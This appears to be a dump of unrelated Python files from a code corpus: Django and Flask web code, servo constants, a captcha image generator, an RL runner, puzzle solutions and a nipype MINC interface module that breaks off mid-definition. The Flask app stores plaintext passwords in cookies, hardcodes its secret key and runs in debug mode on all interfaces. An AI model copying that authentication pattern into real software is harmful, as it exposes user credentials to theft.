dump(clf, 'Model.joblib')
y_pred = clf.predict(x_test)
print("Accuracy: "+str(accuracy_score(y_test, y_pred)))
from sklearn.metrics import confusion_matrix
cm = confusion_matrix(y_test, y_pred)
print(cm)
|
23,416 | cbc21c98ccc268802d440eb5a24dc777c9582474 | def mul_by_2(num):
return num*2
def mul_by_3(num):
return num*3
|
23,417 | 2ae701ae17fae2aa3ebe1c2b0775b28d4db294d3 | from ..models import Pedido, Cliente, Produto
from django import forms
class PedidoForm(forms.ModelForm):
cliente = forms.ModelChoiceField(queryset=Cliente.objects.all()) #faz um campo de escolha com as instancias do objeto
observacoes = forms.CharField(widget=forms.Textarea) #cria um widget para editar o input do formulario
produto = forms.ModelMultipleChoiceField(queryset=Produto.objects.all()) #seleciona mais de uma instancia do objeto
class Meta:
model = Pedido
fields = ['cliente', 'data_pedido', 'valor', 'status', 'observacoes', 'produto'] |
23,418 | 9148d5b4ef81ea0620ca3ab603451260d9f5aacb | # flake8: noqa
"""
bad
bad bad
"""
is very bad
|
23,419 | 05fe945e0ccb67c51252634767798a1567a5a157 | #!flask/bin/python
from flask import render_template, flash, request, redirect, make_response, jsonify
from flask import Flask, url_for
from DbHandler import DBHandler
from flask_wtf import FlaskForm
from wtforms import StringField, PasswordField, BooleanField, SubmitField
from wtforms.validators import DataRequired
import sys
db_handler = DBHandler()
app = Flask(__name__)
app.config.update(dict(
SECRET_KEY="powerful secretkey",
WTF_CSRF_SECRET_KEY="a csrf secret key"
))
userLogged = dict()
cert = '/etc/letsencrypt/live/data4help.cloud/fullchain.pem'
key = '/etc/letsencrypt/live/data4help.cloud/privkey.pem'
class LoginForm(FlaskForm):
username = StringField('Username', validators=[DataRequired()])
password = PasswordField('Password', validators=[DataRequired()])
remember_me = BooleanField('Remember Me')
submit = SubmitField('Sign In')
class RegistrationForm(FlaskForm):
email = StringField('Username', validators=[DataRequired()])
password = PasswordField('Password', validators=[DataRequired()])
company_name = StringField('Company Name', validators=[DataRequired()])
submit = SubmitField('Sign Up')
def auth_user(cookie):
email = cookie.get('email')
if email:
if cookie.get('password') == db_handler.get_third_party_password(email):
return True
else:
return False
def set_cookies(user, psw):
user_logged = {'username': user}
res = make_response(render_template('private.html', title='Private page', user=user_logged,
secret=get_secret(user)))
res.set_cookie('email', user)
res.set_cookie('password', psw)
print("cookie settato")
return res
@app.route('/')
@app.route('/index')
def index():
return render_template('index.html', title='Home')
@app.route('/login', methods=['GET', 'POST'])
def login():
form = LoginForm()
if form.validate_on_submit():
if form.password.data == db_handler.get_third_party_password(form.username.data):
return set_cookies(form.username.data, form.password.data)
return render_template('login.html', title='OKKK', form=form)
return render_template('login.html', title='Sign In', form=form)
@app.route('/registration', methods=['GET', 'POST'])
def registration():
form = RegistrationForm()
if form.validate_on_submit():
db_handler.register_third_party(form.email.data, form.password.data, form.company_name.data)
flash('Signup requested for user {}'.format(form.email.data))
return redirect(url_for('index'))
return render_template('signup.html', title='Sign Up', form=form)
@app.route('/private_page', methods=['GET', 'POST'])
def private_page():
if auth_user(request.cookies):
user_logged = {'username': request.cookies.get('email')}
return render_template('private.html', title='Private Page', user=user_logged, secret=get_secret())
else:
form = LoginForm()
return redirect(url_for('login'))
@app.route('/log_out', methods=['GET', 'POST'])
def log_out():
res = make_response(render_template('index.html', title='Logged out'))
res.set_cookie('email', '', expires=0)
res.set_cookie('password', '', expires=0)
return res
@app.route('/api/thirdparties/renew_third_party_secret', methods=['GET'])
def renew_third_party_secret():
username = request.args.get('username')
secret = request.args.get('secret')
try:
result = db_handler.check_third_party(username, secret)
if result == 0:
return jsonify({'Response': -1, 'Reason': 'Third-party not found'})
else:
try:
db_handler.renew_third_party_secret(username)
except Exception as e:
print(str(e))
return jsonify({'Response': -2, 'Reason': str(e)})
user_logged = {'username': username}
return render_template('private.html', title='Private Page', user=user_logged, secret=get_secret())
except Exception as e:
print(str(e))
return jsonify({'Response': -3, 'Reason': str(e)})
def get_secret(user=''):
if user != '':
return db_handler.get_third_party_secret(user)
return db_handler.get_third_party_secret(request.cookies.get('email'))
if __name__ == '__main__':
try:
try:
# try to run the WebAPP with SSL certificate active
# context = (cert, key)
app.run(host='0.0.0.0', port=443, ssl_context=context, threaded=True, debug=True)
except:
# old mode without SSL certificate for debugging in localhost
app.run(host='0.0.0.0', port=80, threaded=True, debug=True)
except KeyboardInterrupt:
print("[*] Server shutted down")
db_handler.db.close()
sys.exit(0)
|
23,420 | 3ab5d62359f25223ae162a81d8df46925514983a |
import drawer
import traceback
import colorsys
from blinkt import set_pixel, set_brightness, show, clear
import numpy as np
import random
import math
running = True
yMin = [1.0/3.0,18-(1.0/3.0)]
xMax = [.5,25.5]
def framer(N):
Ny = N
Nx = int(N*1.5)
frame = np.zeros((Nx,Ny))
count = 1
while (frame == 0).any():
x = np.random.randint(0,Nx)
y = np.random.randint(0,Ny)
Rx = np.random.randint(-x,Nx-x)
Ry = np.random.randint(-y,Ny-y)
if (frame==0).all():
frame[x:x+Rx] = count
count += 1
print(frame)
for k in range(1,count):
print(np.where(frame == k))
return frame
def switchColor(col):
clear()
if col == 0:
for k in range(0,2):
set_pixel(k,0,255,0)
if col == 1:
for k in range(0,2):
set_pixel(k,255,0,0)
if col == 2:
for k in range(0,2):
set_pixel(k,0,0,255)
show()
def animColor():
spacing = 360.0 / 16.0
hue = 0
clear()
hue = int(time.time() * 100) % 360
for x in range(8):
offset = x * spacing
h = ((hue + offset) % 360) / 360.0
r, g, b = [int(c * 255) for c in colorsys.hsv_to_rgb(h, 1.0, 1.0)]
set_pixel(x, r, g, b)
time.sleep(.05)
show()
time.sleep(2)
clear()
show()
def main():
set_brightness(.05)
switchColor(1)
draw = drawer.Drawer(output = True)
switchColor(2)
print('---Switch is strating')
#intializeDrawer()
flip = False
xSquare = []
for k in range(0,8):
checked = False
while not checked:
x0 = 30 + 200*random.random()
y0 = 30 + 150*random.random()
R0 = 5+15*random.random()
if x0-R0>10 and x0+R0<250 and y0-R0>10 and y0+R0<170:
checked = True
xSquare.append([x0,y0,R0])
print('and the sqaures are : ')
print(xSquare)
try:
for xS in xSquare:
draw.square(xS[0],xS[1],xS[2])
for k in range(10,300):
x = np.arange(10,250,.2)
if flip:
x = np.flip(x)
y = 10+k*.6+2*np.sin((6*math.pi*((x-10)/240))**(1+k/300))
y2 = np.copy(y[(x>=xS[0]-xS[2]) & (x<=xS[0]+xS[2]) & (y>=xS[1]-xS[2]) & (y<=xS[1]+xS[2]) ])
x2 = np.copy(x[(x>=xS[0]-xS[2]) & (x<=xS[0]+xS[2]) & (y>=xS[1]-xS[2]) & (y<=xS[1]+xS[2]) ])
if len(x2)>2:
draw.lines(x2,y2)
flip = not flip
#line(50,50,length=50,angle=0)
#line(50,50,length=55,angle=.1)
#line(50,50,length=60,angle=.2)
#line(50,50,length=65,angle=.4)
#line(50,50,length=70,angle=.8)
#line(50,50,length=75,angle=1.6)
#for k in range(0,10):
#draw.square(100,70,10*k/2.0,noise = 3,speed=500)
#for j in range(0,10):
#square((k+1)*11,(j+1)*11,10,angle=math.pi*(k*j)/(400))
#draw.circle((k+1)*11,(j+1)*11,k+j)
except Exception as e:
print(traceback.format_exc())
draw.toPosition(0,0)
draw.closeDrawer()
switchColor(1)
if __name__ == "__main__":
main() |
23,421 | 33a5bce7b2d97a6051464fe9aa858f48a64eb712 | ##############################################
# The MIT License (MIT)
# Copyright (c) 2016 Kevin Walchko
# see LICENSE for full details
##############################################
"""
This information is specific to Dynamixel's XL-320 servo motor.
http://support.robotis.com/en/product/dynamixel/xl-series/xl-320.htm
"""
# --------- INSTRUCTIONS -----
XL320_PING = 0x01
XL320_READ = 0x02
XL320_WRITE = 0x03
XL320_REG_WRITE = 0x04
XL320_ACTION = 0x05
XL320_RESET = 0x06
XL320_REBOOT = 0x08
XL320_STATUS = 0x55
XL320_SYNC_READ = 0x82
XL320_SYNC_WRITE = 0x83
XL320_BULK_READ = 0x92
XL320_BULK_WRITE = 0x93
# -------- EEPROM -------------
XL320_MODEL_NUMBER = 0
XL320_VER_FIRMWARE = 2
XL320_ID = 3
XL320_BAUD_RATE = 4
XL320_DELAY_TIME = 5
XL320_CW_ANGLE_LIMIT = 6 # min angle, default 0
XL320_CCW_ANGLE_LIMIT = 8 # max angle, default 300
XL320_CONTROL_MODE = 11 # joint or wheel mode, default joint (servo)
XL320_MAX_TORQUE = 15
XL320_RETURN_LEVEL = 17
# -------- RAM ----------------
XL320_TORQUE_ENABLE = 24 # servo mode on/off - turn into wheel
XL320_LED = 25
XL320_GOAL_POSITION = 30
XL320_GOAL_VELOCITY = 32
XL320_GOAL_TORQUE = 35
XL320_PRESENT_POSITION = 37 # current servo angle
XL320_PRESENT_SPEED = 39 # current speed
XL320_PESENT_LOAD = 41 # current load
XL320_PESENT_VOLTAGE = 45 # current voltage
XL320_PESENT_TEMP = 46 # current temperature
XL320_MOVING = 49
XL320_HW_ERROR_STATUS = 50
XL320_PUNCH = 51
# --------- OTHER -------------
XL320_RESET_ALL = 0xFF
XL320_RESET_ALL_BUT_ID = 0x01
XL320_RESET_ALL_BUT_ID_BAUD_RATE = 0x02
XL320_LED_WHITE = 7
XL320_LED_BLUE_GREEN = 6
XL320_LED_PINK = 5
XL320_LED_BLUE = 4
XL320_LED_YELLOW = 3
XL320_LED_GREEN = 2
XL320_LED_RED = 1
XL320_LED_OFF = 0
XL320_BROADCAST_ADDR = 0xfe # a packet with this ID will go to all servos
XL320_WHEEL_MODE = 1
XL320_JOINT_MODE = 2 # normal servo
XL320_9600 = 0 # 0: 9600, 1:57600, 2:115200, 3:1Mbps
XL320_57600 = 1
XL320_115200 = 2
XL320_1000000 = 3
# Conversions from values to strings for debugging
Baudrates = {
0: '9.6 kbps',
1: '57.6 kbps',
2: '115 kbps',
3: '1 Mbps'
}
Modes = {
1: 'Wheel',
2: 'Joint'
}
ReturnTypes = {
0: 'No Return',
1: 'Only Read',
2: 'Return All'
}
LEDColors = {
0: 'Off',
1: 'Red',
2: 'Green',
3: 'Yellow',
4: 'Blue',
5: 'Pink',
6: 'Blue-Green',
7: 'White'
}
Moving = {
0: 'Completed',
1: 'Moving'
}
ErrorMsg = {
0: None,
1: 'ERROR_OVERLOAD',
2: 'ERROR_OVER_HEATING',
4: 'ERROR_INPUT_VOLTAGE'
}
# I don't trust these error number, I bet the documentation is wrong
ErrorStatusMsg = {
-1: 'Not a status packet',
0: None,
1: 'ERROR_RAIL_FAIL',
2: 'ERROR_INTRUCTION',
3: 'ERROR_CRC',
4: 'ERROR_DATA_RANGE',
5: 'ERROR_DATA_LENGTH',
6: 'ERROR_DATA_LIMIT',
7: 'ERROR_ACCEESS',
128: 'ALERT'
}
InstrToStr = {
1: 'Ping',
2: 'Read',
3: 'Write',
6: 'Reset',
8: 'Reboot',
85: 'Status'
}
|
23,422 | 8c67bbd2977f9af70b189d77943e0407429a725a | import numpy as np
from PIL import Image,ImageDraw,ImageFont
font = ImageFont.truetype('1.ttf',size=36)
font1 = ImageFont.truetype('2.ttf',size=36)
font2 = ImageFont.truetype('3.ttf',size=36)
font3 = ImageFont.truetype('4.ttf',size=36)
def num():
return chr(np.random.randint(48,57))
def forward_color():
return (np.random.randint(120,200),
np.random.randint(120,200),
np.random.randint(120,200))
def back_color():
return (np.random.randint(50, 150),
np.random.randint(50, 150),
np.random.randint(50, 150))
w = 120
h =60
path = r'code1'
for i in range(200):
image =Image.new('RGB',(w,h),color=(255,255,255))
img = ImageDraw.Draw(image)
for j in range(w):
for k in range(h):
img.point((j,k),fill=back_color())
list_num = []
for m in range(4):
ch =num()
list_num.append(ch)
img.text((30*m+10,18),text=ch,fill=forward_color(),font=font1)
image.save('{0}/{1}.jpg'.format(path,''.join(list_num)))
|
23,423 | 02e93d0a21aed5564cf03048426b9b422ad40ecc | __version__ = '11'
|
23,424 | 84f81b83184e7d268dbe66f94571eeec0229ccd3 | import functools
def prefSum(a):
return functools.reduce(lambda c, x: c + [c[-1] + x], a, [0])[1:]
print(prefSum(a=[1, 2, 3]))
|
23,425 | 0c5514bfde6486ed96fbf5ebbd9db77e0ae2b9db | class Solution(object):
def isPowerOfTwo(self, n):
while n/2.0>=1:
n=n/2.0
return n==1
#/后写浮点数,才做浮点数除法 |
23,426 | 79c0c84cf04adbc3ee192e9a944459d6a42dc353 | from SAC.algo import SAC
from SAC.model import MLPContiModel, MLPEvaluateModel
from TOOLS.Logger import LoggerPrinter
from ENVS.Envs import MountainCarContiEnv, PendulumEnv
import numpy as np
def main(game_index: int, mode: str) -> None:
"""
该函数实现了在各个游戏下对DDPG算法进行测试
:param game_index: int,
测试游戏环境的编号:
1. 连续控制下的倒立摆
2. 连续控制下的高山行车
:param mode: str,
控制模式,[TRAIN, TEST]
:return: None,
"""
logger = LoggerPrinter()
if game_index == 1:
exp_name = 'Pendulum'
env = PendulumEnv(logger=logger)
act_high = np.array([2., ])
policy_model = MLPContiModel(env.obs_dim, env.act_dim, (30, 15), 'Sigmoid', logger)
evaluate_model = MLPEvaluateModel(env.obs_dim, env.act_dim, (30, 15), 'Sigmoid', logger)
gamma = 0.95
eva_lr = 0.005
pol_lr = 0.005
rho = 0.005
learn_epochs = 25
max_iter_per_epoch = 1500
alpha = 0.3
is_OU_noise = False
elif game_index == 2:
exp_name = 'MountainCarConti'
env = MountainCarContiEnv(logger=logger)
act_high = np.array([1., ])
policy_model = MLPContiModel(env.obs_dim, env.act_dim, (40, 25), 'Sigmoid', logger)
evaluate_model = MLPEvaluateModel(env.obs_dim, env.act_dim, (30, 15), 'Sigmoid', logger)
gamma = 0.99
eva_lr = 0.005
pol_lr = 0.005
rho = 0.005
learn_epochs = 100
max_iter_per_epoch = 1500
alpha = 0.3
is_OU_noise = True
sac = SAC(env, policy_model, evaluate_model, logger, 'MODEL_PARAMS', exp_name, gamma=gamma,
eva_lr=eva_lr, pol_lr=pol_lr, rho=rho, conti_control_max=act_high, alpha=alpha,
is_OU_noise=is_OU_noise)
if mode == 'TRAIN':
sac.train(learn_epochs=learn_epochs, max_iter_per_epoch=max_iter_per_epoch, retrain_label=False,
buffer_size=100000, start_control_step=3000, update_freq=100, sample_size=100, save_freq=1000)
sac.test(test_epochs=10, max_iter_per_epoch=1200)
elif mode == 'TEST':
sac.test(test_epochs=10, max_iter_per_epoch=1500)
if __name__ == '__main__':
main(2, 'TRAIN')
|
23,427 | 547c052b9c73df6c55567e9288b730432e5af9d4 | """
Advent of Code 2018
Day 17: Reservoir Research
"""
from collections import namedtuple
from math import inf
Vein = namedtuple('Vein', ['minx', 'maxx', 'miny', 'maxy'])
Posn = namedtuple('Posn', ['x', 'y'])
EMPTY_SPACE = ' '
def print_grid(grid):
print("\n".join("".join(r) for r in grid))
print()
def parse_scan(input_line):
"Parse a scan from input line."
tokens = input_line.strip().split(', ')
for t in tokens:
label = t[0]
coords = t[2:].split('..')
if len(coords) == 1:
coords.append(coords[0])
if label == 'x':
minx = int(coords[0])
maxx = int(coords[1])
elif label == 'y':
miny = int(coords[0])
maxy = int(coords[1])
return Vein(minx, maxx, miny, maxy)
def new_map(veins):
"Make a map."
minx = inf
maxx = -inf
miny = inf
maxy = -inf
for vn in veins:
minx = min(vn.minx, minx)
maxx = max(vn.maxx, maxx)
miny = min(vn.miny, miny)
maxy = max(vn.maxy, maxy)
wd = maxx - minx + 3
xoff = minx - 1
ht = maxy + 1
grid = [[EMPTY_SPACE for _ in range(wd)] for _ in range(ht)]
for vn in veins:
for y in range(vn.miny, vn.maxy + 1):
for x in range(vn.minx, vn.maxx + 1):
grid[y][x - xoff] = '#'
spring_x, spring_y = 500 - xoff, 0
grid[spring_y][spring_x] = '+'
return grid, Posn(spring_x, spring_y), miny, maxy
def move_up(grid, posn):
if posn.y - 1 > 0:
return Posn(posn.x, posn.y - 1)
def move_down(grid, posn):
if posn.y + 1 < len(grid):
return Posn(posn.x, posn.y + 1)
def move_left(grid, posn):
if posn.x - 1 >= 0:
return Posn(posn.x - 1, posn.y)
def move_right(grid, posn):
if posn.x + 1 < len(grid[0]):
return Posn(posn.x + 1, posn.y)
def grid_get(grid, posn):
return grid[posn.y][posn.x]
def grid_set(grid, posn, cell):
grid[posn.y][posn.x] = cell
def fill_between(grid, left, right, cell="~"):
for x in range(left.x + 1, right.x):
grid_set(grid, Posn(x, left.y), cell)
def find_left(grid, posn):
under = move_down(grid, posn)
if grid_get(grid, under) == '|' or grid_get(grid, under) == EMPTY_SPACE:
return posn
posn = move_left(grid, posn)
while grid_get(grid, posn) != '#':
under = move_down(grid, posn)
if grid_get(grid, under) == '|' or grid_get(grid, under) == EMPTY_SPACE:
return posn
posn = move_left(grid, posn)
if posn is None:
return posn
return posn
def find_right(grid, posn):
under = move_down(grid, posn)
if grid_get(grid, under) == '|' or grid_get(grid, under) == EMPTY_SPACE:
posn = move_right(grid, posn)
while grid_get(grid, posn) != '#':
under = move_down(grid, posn)
if grid_get(grid, under) == '|' or grid_get(grid, under) == EMPTY_SPACE:
break
posn = move_right(grid, posn)
if posn is None:
return posn
return posn
def drip(grid, spring):
parent = {}
queue = [spring]
while queue:
posn = queue.pop()
down = move_down(grid, posn)
if down is None:
continue
if down and grid_get(grid, down) != "#" and grid_get(grid, down) != "~":
grid_set(grid, down, '|')
parent[down] = posn
queue.append(down)
else:
right = find_right(grid, posn)
left = find_left(grid, posn)
if left is None or right is None:
break
if grid_get(grid, left) == '#' and grid_get(grid, right) == '#':
fill_between(grid, left, right, "~")
queue.append(parent[posn])
else:
fill_between(grid, left, right, "|")
if grid_get(grid, left) == EMPTY_SPACE:
grid_set(grid, left, '|')
parent[left] = posn
queue.append(left)
if grid_get(grid, right) == EMPTY_SPACE:
grid_set(grid, right, '|')
parent[right] = posn
queue.append(right)
def solve_a(grid, miny):
"Solve first part of puzzle."
soln = 0
for y in range(miny, len(grid)):
for x in range(len(grid[0])):
if grid[y][x] in ['~', '|']:
soln += 1
return soln
def solve_b(grid, miny):
"Solve second part of puzzle."
soln = 0
for y in range(miny, len(grid)):
for x in range(len(grid[0])):
if grid[y][x] == '~':
soln += 1
return soln
def main():
"Main program."
import sys
veins = [parse_scan(ln) for ln in sys.stdin]
grid, spring, miny, maxy = new_map(veins)
drip(grid, spring)
# print_grid(grid)
print(solve_a(grid, miny))
print(solve_b(grid, miny))
if __name__ == '__main__':
main()
|
23,428 | 9b744cd071df43dffff3b729650b8e7c7db3ae0a |
#def gcd(a, b):
# while b:
# a, b = b, a % b
#return a
#def lcm(a, b):
# w = a //gcd(a,b)
#return w * b
#def insertionSortWithIndex(arr, m):
# for i in range(1, len(arr)):
# key = arr[i]
# l = m[i]
# j = i-1
# while j >=0 and key < arr[j] :
# arr[j+1] = arr[j]
# m[j+1] = m[j]
# j -= 1
# m[j+1] = l
# arr[j+1] = key
#insertionSortWithIndex(arr, indexstore)
#def binary_search(array) -> int:
# def condition(value) -> bool:
# pass
# left, right = min(search_space), max(
# search_space) # could be [0, n], [1, n] etc. Depends on problem
# while left < right:
# mid = left + (right - left) // 2
# if condition(mid):
# right = mid
# else:
# left = mid + 1
# return left
#index = sorted(range(len(nums)), key = lambda x: nums[x])
def solver(N, X, W):
return W*(N//X + (1 if N%X>0 else 0))
if __name__=='__main__':
N, X, T= map(int, input().split())
#arr = list(map(int,input().split()))
print(solver(N,X,T)) |
23,429 | 3c68dec9860986cb1c7de1f97eaef5bac7a0a50d | # emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
"""The minc module provides classes for interfacing with the `MINC
<http://www.bic.mni.mcgill.ca/ServicesSoftware/MINC>`_ command line tools. This
module was written to work with MINC version 2.2.00.
Author: `Carlo Hamalainen <http://carlo-hamalainen.net>`__
"""
import glob
import os
import os.path
import re
import warnings
from ..base import (
TraitedSpec,
CommandLineInputSpec,
CommandLine,
StdOutCommandLineInputSpec,
StdOutCommandLine,
File,
Directory,
InputMultiPath,
OutputMultiPath,
traits,
isdefined,
)
from .base import aggregate_filename
warnings.filterwarnings("always", category=UserWarning)
class ExtractInputSpec(StdOutCommandLineInputSpec):
input_file = File(
desc="input file", exists=True, mandatory=True, argstr="%s", position=-2
)
output_file = File(
desc="output file",
position=-1,
name_source=["input_file"],
hash_files=False,
name_template="%s.raw",
keep_extension=False,
)
_xor_write = (
"write_ascii",
"write_ascii",
"write_byte",
"write_short",
"write_int",
"write_long",
"write_float",
"write_double",
"write_signed",
"write_unsigned",
)
write_ascii = traits.Bool(
desc="Write out data as ascii strings (default).",
argstr="-ascii",
xor=_xor_write,
)
write_byte = traits.Bool(
desc="Write out data as bytes.", argstr="-byte", xor=_xor_write
)
write_short = traits.Bool(
desc="Write out data as short integers.", argstr="-short", xor=_xor_write
)
write_int = traits.Bool(
desc="Write out data as 32-bit integers.", argstr="-int", xor=_xor_write
)
write_long = traits.Bool(
desc="Superseded by write_int.", argstr="-long", xor=_xor_write
)
write_float = traits.Bool(
desc="Write out data as single precision floating-point values.",
argstr="-float",
xor=_xor_write,
)
write_double = traits.Bool(
desc="Write out data as double precision floating-point values.",
argstr="-double",
xor=_xor_write,
)
_xor_signed = ("write_signed", "write_unsigned")
write_signed = traits.Bool(
desc="Write out signed data.", argstr="-signed", xor=_xor_signed
)
write_unsigned = traits.Bool(
desc="Write out unsigned data.", argstr="-unsigned", xor=_xor_signed
)
write_range = traits.Tuple(
traits.Float,
traits.Float,
argstr="-range %s %s",
desc="Specify the range of output values\nDefault value: 1.79769e+308 1.79769e+308.",
)
_xor_normalize = ("normalize", "nonormalize")
normalize = traits.Bool(
desc="Normalize integer pixel values to file max and min.",
argstr="-normalize",
xor=_xor_normalize,
)
nonormalize = traits.Bool(
desc="Turn off pixel normalization.", argstr="-nonormalize", xor=_xor_normalize
)
image_range = traits.Tuple(
traits.Float,
traits.Float,
desc="Specify the range of real image values for normalization.",
argstr="-image_range %s %s",
)
image_minimum = traits.Float(
desc=(
"Specify the minimum real image value for normalization."
"Default value: 1.79769e+308."
),
argstr="-image_minimum %s",
)
image_maximum = traits.Float(
desc=(
"Specify the maximum real image value for normalization."
"Default value: 1.79769e+308."
),
argstr="-image_maximum %s",
)
start = InputMultiPath(
traits.Int,
desc="Specifies corner of hyperslab (C conventions for indices).",
sep=",",
argstr="-start %s",
)
count = InputMultiPath(
traits.Int,
desc="Specifies edge lengths of hyperslab to read.",
sep=",",
argstr="-count %s",
)
# FIXME Can we make sure that len(start) == len(count)?
_xor_flip = (
"flip_positive_direction",
"flip_negative_direction",
"flip_any_direction",
)
flip_positive_direction = traits.Bool(
desc="Flip images to always have positive direction.",
argstr="-positive_direction",
xor=_xor_flip,
)
flip_negative_direction = traits.Bool(
desc="Flip images to always have negative direction.",
argstr="-negative_direction",
xor=_xor_flip,
)
flip_any_direction = traits.Bool(
desc="Do not flip images (Default).", argstr="-any_direction", xor=_xor_flip
)
_xor_x_flip = ("flip_x_positive", "flip_x_negative", "flip_x_any")
flip_x_positive = traits.Bool(
desc="Flip images to give positive xspace:step value (left-to-right).",
argstr="+xdirection",
xor=_xor_x_flip,
)
flip_x_negative = traits.Bool(
desc="Flip images to give negative xspace:step value (right-to-left).",
argstr="-xdirection",
xor=_xor_x_flip,
)
flip_x_any = traits.Bool(
desc="Don't flip images along x-axis (default).",
argstr="-xanydirection",
xor=_xor_x_flip,
)
_xor_y_flip = ("flip_y_positive", "flip_y_negative", "flip_y_any")
flip_y_positive = traits.Bool(
desc="Flip images to give positive yspace:step value (post-to-ant).",
argstr="+ydirection",
xor=_xor_y_flip,
)
flip_y_negative = traits.Bool(
desc="Flip images to give negative yspace:step value (ant-to-post).",
argstr="-ydirection",
xor=_xor_y_flip,
)
flip_y_any = traits.Bool(
desc="Don't flip images along y-axis (default).",
argstr="-yanydirection",
xor=_xor_y_flip,
)
_xor_z_flip = ("flip_z_positive", "flip_z_negative", "flip_z_any")
flip_z_positive = traits.Bool(
desc="Flip images to give positive zspace:step value (inf-to-sup).",
argstr="+zdirection",
xor=_xor_z_flip,
)
flip_z_negative = traits.Bool(
desc="Flip images to give negative zspace:step value (sup-to-inf).",
argstr="-zdirection",
xor=_xor_z_flip,
)
flip_z_any = traits.Bool(
desc="Don't flip images along z-axis (default).",
argstr="-zanydirection",
xor=_xor_z_flip,
)
class ExtractOutputSpec(TraitedSpec):
output_file = File(desc="output file in raw/text format", exists=True)
class Extract(StdOutCommandLine):
"""Dump a hyperslab of MINC file data.
Examples
--------
>>> from nipype.interfaces.minc import Extract
>>> from nipype.interfaces.minc.testdata import minc2Dfile
>>> extract = Extract(input_file=minc2Dfile)
>>> extract.run() # doctest: +SKIP
>>> extract = Extract(input_file=minc2Dfile, start=[3, 10, 5], count=[4, 4, 4]) # extract a 4x4x4 slab at offset [3, 10, 5]
>>> extract.run() # doctest: +SKIP
"""
input_spec = ExtractInputSpec
output_spec = ExtractOutputSpec
_cmd = "mincextract"
class ToRawInputSpec(StdOutCommandLineInputSpec):
input_file = File(
desc="input file", exists=True, mandatory=True, argstr="%s", position=-2
)
output_file = File(
desc="output file",
position=-1,
name_source=["input_file"],
hash_files=False,
name_template="%s.raw",
keep_extension=False,
)
_xor_write = (
"write_byte",
"write_short",
"write_int",
"write_long",
"write_float",
"write_double",
)
write_byte = traits.Bool(
desc="Write out data as bytes.", argstr="-byte", xor=_xor_write
)
write_short = traits.Bool(
desc="Write out data as short integers.", argstr="-short", xor=_xor_write
)
write_int = traits.Bool(
desc="Write out data as 32-bit integers.", argstr="-int", xor=_xor_write
)
write_long = traits.Bool(
desc="Superseded by write_int.", argstr="-long", xor=_xor_write
)
write_float = traits.Bool(
desc="Write out data as single precision floating-point values.",
argstr="-float",
xor=_xor_write,
)
write_double = traits.Bool(
desc="Write out data as double precision floating-point values.",
argstr="-double",
xor=_xor_write,
)
_xor_signed = ("write_signed", "write_unsigned")
write_signed = traits.Bool(
desc="Write out signed data.", argstr="-signed", xor=_xor_signed
)
write_unsigned = traits.Bool(
desc="Write out unsigned data.", argstr="-unsigned", xor=_xor_signed
)
write_range = traits.Tuple(
traits.Float,
traits.Float,
argstr="-range %s %s",
desc=(
"Specify the range of output values."
"Default value: 1.79769e+308 1.79769e+308."
),
)
_xor_normalize = ("normalize", "nonormalize")
normalize = traits.Bool(
desc="Normalize integer pixel values to file max and min.",
argstr="-normalize",
xor=_xor_normalize,
)
nonormalize = traits.Bool(
desc="Turn off pixel normalization.", argstr="-nonormalize", xor=_xor_normalize
)
class ToRawOutputSpec(TraitedSpec):
output_file = File(desc="output file in raw format", exists=True)
class ToRaw(StdOutCommandLine):
"""Dump a chunk of MINC file data. This program is largely
superseded by mincextract (see Extract).
Examples
--------
>>> from nipype.interfaces.minc import ToRaw
>>> from nipype.interfaces.minc.testdata import minc2Dfile
>>> toraw = ToRaw(input_file=minc2Dfile)
>>> toraw.run() # doctest: +SKIP
>>> toraw = ToRaw(input_file=minc2Dfile, write_range=(0, 100))
>>> toraw.run() # doctest: +SKIP
"""
input_spec = ToRawInputSpec
output_spec = ToRawOutputSpec
_cmd = "minctoraw"
class ConvertInputSpec(CommandLineInputSpec):
input_file = File(
desc="input file for converting",
exists=True,
mandatory=True,
argstr="%s",
position=-2,
)
output_file = File(
desc="output file",
genfile=True,
argstr="%s",
position=-1,
name_source=["input_file"],
hash_files=False,
name_template="%s_convert_output.mnc",
)
clobber = traits.Bool(
desc="Overwrite existing file.",
argstr="-clobber",
usedefault=True,
default_value=True,
)
two = traits.Bool(desc="Create a MINC 2 output file.", argstr="-2")
template = traits.Bool(
desc=(
"Create a template file. The dimensions, variables, and"
"attributes of the input file are preserved but all data it set to zero."
),
argstr="-template",
)
compression = traits.Enum(
0,
1,
2,
3,
4,
5,
6,
7,
8,
9,
argstr="-compress %s",
desc="Set the compression level, from 0 (disabled) to 9 (maximum).",
)
chunk = traits.Range(
low=0,
desc="Set the target block size for chunking (0 default, >1 block size).",
argstr="-chunk %d",
)
class ConvertOutputSpec(TraitedSpec):
output_file = File(desc="output file", exists=True)
class Convert(CommandLine):
"""convert between MINC 1 to MINC 2 format.
Examples
--------
>>> from nipype.interfaces.minc import Convert
>>> from nipype.interfaces.minc.testdata import minc2Dfile
>>> c = Convert(input_file=minc2Dfile, output_file='/tmp/out.mnc', two=True) # Convert to MINC2 format.
>>> c.run() # doctest: +SKIP
"""
input_spec = ConvertInputSpec
output_spec = ConvertOutputSpec
_cmd = "mincconvert"
class CopyInputSpec(CommandLineInputSpec):
input_file = File(
desc="input file to copy", exists=True, mandatory=True, argstr="%s", position=-2
)
output_file = File(
desc="output file",
genfile=True,
argstr="%s",
position=-1,
name_source=["input_file"],
hash_files=False,
name_template="%s_copy.mnc",
)
_xor_pixel = ("pixel_values", "real_values")
pixel_values = traits.Bool(
desc="Copy pixel values as is.", argstr="-pixel_values", xor=_xor_pixel
)
real_values = traits.Bool(
desc="Copy real pixel intensities (default).",
argstr="-real_values",
xor=_xor_pixel,
)
class CopyOutputSpec(TraitedSpec):
output_file = File(desc="output file", exists=True)
class Copy(CommandLine):
"""
Copy image values from one MINC file to another. Both the input
and output files must exist, and the images in both files must
have an equal number dimensions and equal dimension lengths.
NOTE: This program is intended primarily for use with scripts
such as mincedit. It does not follow the typical design rules of
most MINC command-line tools and therefore should be used only
with caution.
"""
input_spec = CopyInputSpec
output_spec = CopyOutputSpec
_cmd = "minccopy"
class ToEcatInputSpec(CommandLineInputSpec):
input_file = File(
desc="input file to convert",
exists=True,
mandatory=True,
argstr="%s",
position=-2,
)
output_file = File(
desc="output file",
genfile=True,
argstr="%s",
position=-1,
name_source=["input_file"],
hash_files=False,
name_template="%s_to_ecat.v",
keep_extension=False,
)
ignore_patient_variable = traits.Bool(
desc="Ignore information from the minc patient variable.",
